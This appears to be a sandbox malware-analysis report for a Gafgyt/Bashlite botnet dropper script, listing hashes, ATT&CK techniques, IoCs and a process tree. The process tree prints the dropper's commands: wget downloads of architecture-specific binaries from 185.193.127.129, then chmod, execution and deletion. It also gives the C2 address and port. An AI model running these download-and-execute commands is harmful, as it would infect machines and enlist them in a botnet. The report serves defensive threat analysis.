gafgyt | c79521931c904cd5053cb511ed66a8c2749f1dfdd8cd5d2c8dd0f2d6092d1cfe

Analysis

max time kernel
149s
max time network
151s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
01-11-2024 05:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c79521931c904cd5053cb511ed66a8c2749f1dfdd8cd5d2c8dd0f2d6092d1cfe.sh
Size

2KB
MD5

99ad987d3e0c6c41bdc62b71e89f55b0
SHA1

945f7dd549843b1517e3ab1d4ed80651d0f2ebcb
SHA256

c79521931c904cd5053cb511ed66a8c2749f1dfdd8cd5d2c8dd0f2d6092d1cfe
SHA512

1cfc50502259abca83fb4ffbfeb3e0e07eef9212d50f311b5a901c121b3e2ebf5c08cd1240cd5dbfa022114f44d6c542e026db3df5e386c0daada34c14266f15

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

185.193.127.129:7777

Signatures

Detected Gafgyt variant 13 IoCs

Processes:

resource	yara_rule
/tmp/m-i.p-s.DUSK	family_gafgyt
/tmp/m-p.s-l.DUSK	family_gafgyt
/tmp/s-h.4-.DUSK	family_gafgyt
/tmp/x-8.6-.DUSK	family_gafgyt
/tmp/a-r.m-6.DUSK	family_gafgyt
/tmp/i-6.8-6.DUSK	family_gafgyt
/tmp/p-p.c-.DUSK	family_gafgyt
/tmp/i-5.8-6.DUSK	family_gafgyt
/tmp/m-6.8-k.DUSK	family_gafgyt
/tmp/a-r.m-7.DUSK	family_gafgyt
/tmp/a-r.m-4.DUSK	family_gafgyt
/tmp/a-r.m-5.DUSK	family_gafgyt
/tmp/s-p.a-k.DUSK	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid process

1550 chmod
1566 chmod
1524 chmod
1530 chmod
1535 chmod
1509 chmod
1514 chmod
1561 chmod
1519 chmod
1556 chmod
1576 chmod
1541 chmod
1546 chmod
1571 chmod

pid	process
1550	chmod
1566	chmod
1524	chmod
1530	chmod
1535	chmod
1509	chmod
1514	chmod
1561	chmod
1519	chmod
1556	chmod
1576	chmod
1541	chmod
1546	chmod
1571	chmod

Executes dropped EXE 13 IoCs

Processes:

m-i.p-s.DUSKm-p.s-l.DUSKs-h.4-.DUSKx-8.6-.DUSKa-r.m-6.DUSKi-6.8-6.DUSKp-p.c-.DUSKi-5.8-6.DUSKm-6.8-k.DUSKa-r.m-7.DUSKa-r.m-4.DUSKa-r.m-5.DUSKs-p.a-k.DUSK

ioc	pid	process
/tmp/m-i.p-s.DUSK	1510	m-i.p-s.DUSK
/tmp/m-p.s-l.DUSK	1515	m-p.s-l.DUSK
/tmp/s-h.4-.DUSK	1520	s-h.4-.DUSK
/tmp/x-8.6-.DUSK	1525	x-8.6-.DUSK
/tmp/a-r.m-6.DUSK	1531	a-r.m-6.DUSK
/tmp/i-6.8-6.DUSK	1536	i-6.8-6.DUSK
/tmp/p-p.c-.DUSK	1542	p-p.c-.DUSK
/tmp/i-5.8-6.DUSK	1551	i-5.8-6.DUSK
/tmp/m-6.8-k.DUSK	1557	m-6.8-k.DUSK
/tmp/a-r.m-7.DUSK	1562	a-r.m-7.DUSK
/tmp/a-r.m-4.DUSK	1567	a-r.m-4.DUSK
/tmp/a-r.m-5.DUSK	1572	a-r.m-5.DUSK
/tmp/s-p.a-k.DUSK	1577	s-p.a-k.DUSK

Reads system routing table 1 TTPs 3 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

Processes:

x-8.6-.DUSKi-6.8-6.DUSKi-5.8-6.DUSK

description	ioc	process
File opened for reading	/proc/net/route	x-8.6-.DUSK
File opened for reading	/proc/net/route	i-6.8-6.DUSK
File opened for reading	/proc/net/route	i-5.8-6.DUSK

Reads system network configuration 1 TTPs 3 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

Processes:

x-8.6-.DUSKi-6.8-6.DUSKi-5.8-6.DUSK

description	ioc	process
File opened for reading	/proc/net/route	x-8.6-.DUSK
File opened for reading	/proc/net/route	i-6.8-6.DUSK
File opened for reading	/proc/net/route	i-5.8-6.DUSK

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwget

description	ioc	process
File opened for modification	/tmp/a-r.m-5.DUSK	wget
File opened for modification	/tmp/m-i.p-s.DUSK	wget
File opened for modification	/tmp/s-h.4-.DUSK	wget
File opened for modification	/tmp/i-6.8-6.DUSK	wget
File opened for modification	/tmp/p-p.c-.DUSK	wget
File opened for modification	/tmp/i-5.8-6.DUSK	wget
File opened for modification	/tmp/m-6.8-k.DUSK	wget
File opened for modification	/tmp/m-p.s-l.DUSK	wget
File opened for modification	/tmp/x-8.6-.DUSK	wget
File opened for modification	/tmp/a-r.m-6.DUSK	wget
File opened for modification	/tmp/a-r.m-7.DUSK	wget
File opened for modification	/tmp/a-r.m-4.DUSK	wget
File opened for modification	/tmp/s-p.a-k.DUSK	wget

/tmp/c79521931c904cd5053cb511ed66a8c2749f1dfdd8cd5d2c8dd0f2d6092d1cfe.sh
/tmp/c79521931c904cd5053cb511ed66a8c2749f1dfdd8cd5d2c8dd0f2d6092d1cfe.sh
1⤵
PID:1504

/usr/bin/wget
wget http://185.193.127.129/m-i.p-s.DUSK
2⤵
- Writes file to tmp directory
PID:1505

/bin/chmod
chmod +x m-i.p-s.DUSK
2⤵
- File and Directory Permissions Modification
PID:1509

/tmp/m-i.p-s.DUSK
./m-i.p-s.DUSK
2⤵
- Executes dropped EXE
PID:1510

/bin/rm
rm -rf m-i.p-s.DUSK
2⤵
PID:1512

/usr/bin/wget
wget http://185.193.127.129/m-p.s-l.DUSK
2⤵
- Writes file to tmp directory
PID:1513

/bin/chmod
chmod +x m-p.s-l.DUSK
2⤵
- File and Directory Permissions Modification
PID:1514

/tmp/m-p.s-l.DUSK
./m-p.s-l.DUSK
2⤵
- Executes dropped EXE
PID:1515

/bin/rm
rm -rf m-p.s-l.DUSK
2⤵
PID:1517

/usr/bin/wget
wget http://185.193.127.129/s-h.4-.DUSK
2⤵
- Writes file to tmp directory
PID:1518

/bin/chmod
chmod +x s-h.4-.DUSK
2⤵
- File and Directory Permissions Modification
PID:1519

/tmp/s-h.4-.DUSK
./s-h.4-.DUSK
2⤵
- Executes dropped EXE
PID:1520

/bin/rm
rm -rf s-h.4-.DUSK
2⤵
PID:1522

/usr/bin/wget
wget http://185.193.127.129/x-8.6-.DUSK
2⤵
- Writes file to tmp directory
PID:1523

/bin/chmod
chmod +x x-8.6-.DUSK
2⤵
- File and Directory Permissions Modification
PID:1524

/tmp/x-8.6-.DUSK
./x-8.6-.DUSK
2⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:1525

/bin/rm
rm -rf x-8.6-.DUSK
2⤵
PID:1528

/usr/bin/wget
wget http://185.193.127.129/a-r.m-6.DUSK
2⤵
- Writes file to tmp directory
PID:1529

/bin/chmod
chmod +x a-r.m-6.DUSK
2⤵
- File and Directory Permissions Modification
PID:1530

/tmp/a-r.m-6.DUSK
./a-r.m-6.DUSK
2⤵
- Executes dropped EXE
PID:1531

/bin/rm
rm -rf a-r.m-6.DUSK
2⤵
PID:1533

/usr/bin/wget
wget http://185.193.127.129/i-6.8-6.DUSK
2⤵
- Writes file to tmp directory
PID:1534

/bin/chmod
chmod +x i-6.8-6.DUSK
2⤵
- File and Directory Permissions Modification
PID:1535

/tmp/i-6.8-6.DUSK
./i-6.8-6.DUSK
2⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:1536

/bin/rm
rm -rf i-6.8-6.DUSK
2⤵
PID:1539

/usr/bin/wget
wget http://185.193.127.129/p-p.c-.DUSK
2⤵
- Writes file to tmp directory
PID:1540

/bin/chmod
chmod +x p-p.c-.DUSK
2⤵
- File and Directory Permissions Modification
PID:1541

/tmp/p-p.c-.DUSK
./p-p.c-.DUSK
2⤵
- Executes dropped EXE
PID:1542

/bin/rm
rm -rf p-p.c-.DUSK
2⤵
PID:1544

/usr/bin/wget
wget http://185.193.127.129/p-p.c-440.DUSK
2⤵
PID:1545

/bin/chmod
chmod +x p-p.c-440.DUSK
2⤵
- File and Directory Permissions Modification
PID:1546

/tmp/p-p.c-440.DUSK
./p-p.c-440.DUSK
2⤵
PID:1547

/bin/rm
rm -rf p-p.c-440.DUSK
2⤵
PID:1548

/usr/bin/wget
wget http://185.193.127.129/i-5.8-6.DUSK
2⤵
- Writes file to tmp directory
PID:1549

/bin/chmod
chmod +x i-5.8-6.DUSK
2⤵
- File and Directory Permissions Modification
PID:1550

/tmp/i-5.8-6.DUSK
./i-5.8-6.DUSK
2⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:1551

/bin/rm
rm -rf i-5.8-6.DUSK
2⤵
PID:1554

/usr/bin/wget
wget http://185.193.127.129/m-6.8-k.DUSK
2⤵
- Writes file to tmp directory
PID:1555

/bin/chmod
chmod +x m-6.8-k.DUSK
2⤵
- File and Directory Permissions Modification
PID:1556

/tmp/m-6.8-k.DUSK
./m-6.8-k.DUSK
2⤵
- Executes dropped EXE
PID:1557

/bin/rm
rm -rf m-6.8-k.DUSK
2⤵
PID:1559

/usr/bin/wget
wget http://185.193.127.129/a-r.m-7.DUSK
2⤵
- Writes file to tmp directory
PID:1560

/bin/chmod
chmod +x a-r.m-7.DUSK
2⤵
- File and Directory Permissions Modification
PID:1561

/tmp/a-r.m-7.DUSK
./a-r.m-7.DUSK
2⤵
- Executes dropped EXE
PID:1562

/bin/rm
rm -rf a-r.m-7.DUSK
2⤵
PID:1564

/usr/bin/wget
wget http://185.193.127.129/a-r.m-4.DUSK
2⤵
- Writes file to tmp directory
PID:1565

/bin/chmod
chmod +x a-r.m-4.DUSK
2⤵
- File and Directory Permissions Modification
PID:1566

/tmp/a-r.m-4.DUSK
./a-r.m-4.DUSK
2⤵
- Executes dropped EXE
PID:1567

/bin/rm
rm -rf a-r.m-4.DUSK
2⤵
PID:1569

/usr/bin/wget
wget http://185.193.127.129/a-r.m-5.DUSK
2⤵
- Writes file to tmp directory
PID:1570

/bin/chmod
chmod +x a-r.m-5.DUSK
2⤵
- File and Directory Permissions Modification
PID:1571

/tmp/a-r.m-5.DUSK
./a-r.m-5.DUSK
2⤵
- Executes dropped EXE
PID:1572

/bin/rm
rm -rf a-r.m-5.DUSK
2⤵
PID:1574

/usr/bin/wget
wget http://185.193.127.129/s-p.a-k.DUSK
2⤵
- Writes file to tmp directory
PID:1575

/bin/chmod
chmod +x s-p.a-k.DUSK
2⤵
- File and Directory Permissions Modification
PID:1576

/tmp/s-p.a-k.DUSK
./s-p.a-k.DUSK
2⤵
- Executes dropped EXE
PID:1577

/bin/rm
rm -rf s-p.a-k.DUSK
2⤵
PID:1579

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a-r.m-4.DUSK

Filesize
105KB

MD5
f2b04f085f8d186adabd888839156a8b

SHA1
99bfaadf512162553a8a892bcc98392aa36d1e00

SHA256
3668b383611f5db36099bed58f2499f507ceb1ee577c4d3fb35e9143d77526b6

SHA512
14770393793540bf27fe1fdff154005848ce7faff6d02b4955ef2f0d5d1c33759ff2dfe6a4f6f3a2a675f7b287ffc587e6ca0e99bd87357c174580c9789c3061

Download Submit
/tmp/a-r.m-5.DUSK

Filesize
98KB

MD5
1054284623bfe4baba57234b443983ef

SHA1
e8d2ff7285998db1390c456f60bfae2b0968664f

SHA256
3bafc0c00ee40a90ceb9b14a1881f7cef2eba19963e6b43bfc84ea598b829baf

SHA512
25538a9787a0be4b77ac7770d04d5ae8ec78c83d1dcbcb0058dcea9cb2dd08017ee1942241519d8d94a278c91a2e625141357aabfc9148df1ce151672846d8d9

Download Submit
/tmp/a-r.m-6.DUSK

Filesize
118KB

MD5
8e95bb0577ae02bc991203404178a310

SHA1
e1e1a47fafe0bb078dbb1ae5ab8bfe08bed82013

SHA256
cd18a2f77edee9a4fa0c7b486fc82b40972a4373927e93542d3226327450b2e0

SHA512
6fdda19b143ae12c1c723ad252888acc2e2c83fe5402ca80deae4b062cc515b35500dfc6ba89450fc10722f5b02b29f72d4921c48a0f0624d9f67ea8039a9960

Download Submit
/tmp/a-r.m-7.DUSK

Filesize
156KB

MD5
709023f64f28b5443d54fe1dc915faa2

SHA1
0895a44e1c09b317ff338eee3f4abc5665868c79

SHA256
4e9359833f98338f62c6d7e1fa3dff1c10376e3f95d315293ada37cc558d46f9

SHA512
c2eabb2d4265d2dcd70213492e96101bf4db6fa4a57b5fadc0f1663595a535b45acf8c5b3773545aa628b8850cd89f1ba92b67ac2701ff1b15da383708b7469b

Download Submit
/tmp/i-5.8-6.DUSK

Filesize
79KB

MD5
286f1b0bd50f0a1233236a03203fd9fa

SHA1
88edba496ee1d9c13f35db663691ac857038ea05

SHA256
9d64d75f9f49be7354d90cad0e195ecf516dd5bcf09c8af3932ed5a6ce3e23d4

SHA512
cc5141b7f8209e81c7c739834b1c193991b608c7cdf62047524eda443211b7c779f8f74602d6b47ea533ddec36ad31ebde87c3e59c2caed0bfb0e10d690fc788

Download Submit
/tmp/i-6.8-6.DUSK

Filesize
83KB

MD5
a04b6f60216ef18d339288b4137caf66

SHA1
da8df20ccb97b56ef0bd9c261d1c7c8a82a42ab2

SHA256
7a1b1537cea91f447051b40644b586e5529da096ad0005df1c2c02a0b2548289

SHA512
3219712b62866c746acd87377c85af26cb50a1aaae75755ce1835c501868d3eb67479a3ff9815edaf694ce5d16c2eaca296472fe99d815b24d99d9433d60aa9b

Download Submit
/tmp/m-6.8-k.DUSK

Filesize
96KB

MD5
828a8d00f95980abe7d7adc61328fd84

SHA1
e657f6a8e7e5a330d86c87f56f8fc0b295e89699

SHA256
918693a7214646cca7d0815f52419a8de5277f2b5d9a7152ff6e515cef7f781c

SHA512
51de380c99da642d58df34376d0bd1f1e039c69c671a205569bce4da898cedac5e193ab0ee2ece2e5c62966a40240642578fb85b4902be3ae3afb174bfc70016

Download Submit
/tmp/m-i.p-s.DUSK

Filesize
123KB

MD5
d77182b0a560e8bccb81d44be21c434c

SHA1
ae7a52c0d3bfdf9974f4ff225548d6649ca24d90

SHA256
d33ae292211a2c2bf44e636e6ce2cf84a34068463eb39e02ff55a3520fe769c6

SHA512
da17964006412fef72c9811b114b1d5b9ec058eefef1011e5a8289d4ba8a53979be14b4a65148f21a39b94f11ed2423454b16a73828f1f323e77460fa97897ad

Download Submit
/tmp/m-p.s-l.DUSK

Filesize
123KB

MD5
f9011b17d0ad03bb97f10f4795c5665c

SHA1
b03d90980f7111ca11a6b8161051c129fa342844

SHA256
8ba711c2d75e978e81c54cbe7e322791c9fe125d13e0ec6003f7350d4a666320

SHA512
e5ca1ed279ceec8eee4a92e3f52eb557b3e64a51430fffb855cbb8d55ed339870ae4ce690f4c3e5645917f61014bc92b50b54c125f149543eb1cc13242e4b8bf

Download Submit
/tmp/p-p.c-.DUSK

Filesize
91KB

MD5
b2c3561f8d6e378e4ddd4a53dca14cfd

SHA1
bfda59df6dffee933c7b2d717d4ef44ebafe41fe

SHA256
bc9d76adaabe1facb3facfc33ec89da1f79242bef1d73f67faad730b57036901

SHA512
498437f473ea19246507cfc276734bef769eefbc821afdd9fbc086125e4c44765c1c270db7b50c30b2e00289cc01fedefb7209896a91e4fe577508125f2d69f5

Download Submit
/tmp/s-h.4-.DUSK

Filesize
86KB

MD5
a8c99f1fcd8f53359e215fdb2dd14998

SHA1
a765bd784a5a344dad113afc78d0d2ffb396d515

SHA256
0246ac066d86ad138a9676199ba52d169ad4f10ee47761a0545036612712b5b1

SHA512
7cc15dda1e8fe02ec8509522ec08624044819e412270198f6a9e94a0e38979468630c8373f5caa8b08998ffc0cd260aad77ae25e6ac88b0c3d4dfaf41ca4371c

Download Submit
/tmp/s-p.a-k.DUSK

Filesize
104KB

MD5
d2d6187970b039fca42207037f66821b

SHA1
9fcd51f597e47b34ad9e0c11d29c68ba5b6ebec5

SHA256
e6aceaca9722f71c072da01583da16423f513ed5162092ab082d4fca7a2cdf5b

SHA512
57cc7f04f333909ef5f324fd74e01d4dc4def7ff6fcb2321366c8e2a17fc7c8b0af5b04b344a59e7fbeafc7ce37ffb1eb98d6ed45d6a0374608dbd39a1f34dad

Download Submit
/tmp/x-8.6-.DUSK

Filesize
92KB

MD5
5d52f711cd2e0f7c8f9d41f4c190f750

SHA1
e1b9de4f2188fe6748fabffeb1fd86161b298b4d

SHA256
46e021d816c162213fe5767cf7b390be9bd98dd585d3be819e135b320558679b

SHA512
00cef6c6673b5419f343bee855dcae7a75cf1654bdb10fedd443e1af739cb6be538df48112c947312a39df33bd217d6fb5d55ac6cbeb195000107e6dbf188c8c

Download Submit